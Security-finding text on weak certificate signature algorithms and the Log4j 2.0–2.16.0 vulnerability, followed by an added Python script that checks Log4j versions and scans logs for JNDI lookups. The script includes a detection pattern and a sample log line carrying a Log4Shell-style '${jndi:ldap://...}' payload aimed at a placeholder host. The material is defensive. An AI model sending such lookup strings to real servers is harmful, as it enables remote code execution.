MD2, MD4, MD5 and SHA1 signature algorithms are known to be vulnerable to [collision attacks](https://en.wikipedia.org/wiki/Collision_attack). An attacker can exploit this to generate another certificate with the same digital signature, allowing them to masquerade as the affected service.
The Log4j library is a popular logging library used across the JVM ecosystem. If you are using a vulnerable version of Log4j (a version between 2.0 and 2.16.0), RCE (Remote Code Execution) and DoS (Denial of Service) attacks are possible through abuse of Log4j's template processing algorithm. If your code logs request data (such as a User-Agent header), an attacker can perform a malicious JNDI object lookup to chain other exploits, or induce the application to process a malicious template string, resulting in a DoS attack.

Update your Log4j version to 2.17.0 to mitigate these vulnerabilities.
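As an added illustration (not part of the original finding text), the following Python checks the two things a defender wants from this finding: whether a Log4j version string falls in the 2.0 to 2.16.0 range described above, and whether logged request data already contains JNDI lookup strings. The log lines are constructed samples, and the host in the lookup string is a placeholder.

```python
import re

# Range the finding describes: Log4j 2.0 up to and including 2.16.0; 2.17.0 is the fix.
FIRST_AFFECTED = (2, 0, 0)
FIXED_VERSION = (2, 17, 0)


def parse_version(text: str) -> tuple:
    """Turn '2.16.0' or '2.0-beta9' into a comparable 3-tuple of ints (numeric parts only)."""
    nums = re.findall(r"\d+", text.split("-")[0])
    parts = tuple(int(n) for n in nums[:3])
    return parts + (0,) * (3 - len(parts))


def is_vulnerable_version(version: str) -> bool:
    """True for the 2.0 .. 2.16.0 range named in the finding; 2.17.0 and later are fixed."""
    return FIRST_AFFECTED <= parse_version(version) < FIXED_VERSION


# Log4j lookups use the "${...}" template syntax; a JNDI lookup opens with "${jndi:".
# Matching that prefix (case-insensitively) is enough to flag a request for investigation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(log_lines) -> list:
    """Return (line number, line) for every log line carrying a JNDI lookup string."""
    return [(n, line) for n, line in enumerate(log_lines, start=1) if JNDI_LOOKUP.search(line)]


# Constructed sample access-log lines (not real traffic). The second line carries a lookup
# string in the User-Agent field, the kind of request data a web application tends to log.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://PLACEHOLDER-HOST/x}"',
    '10.0.0.7 - - [10/Dec/2021:10:00:03 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for ver in ("2.14.1", "2.16.0", "2.17.0"):
        print(ver, "vulnerable" if is_vulnerable_version(ver) else "fixed")
    for n, _ in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup string found in logged request data")
```

The version check only covers the range this finding states; pre-release tags such as `-beta9` are compared by their numeric part.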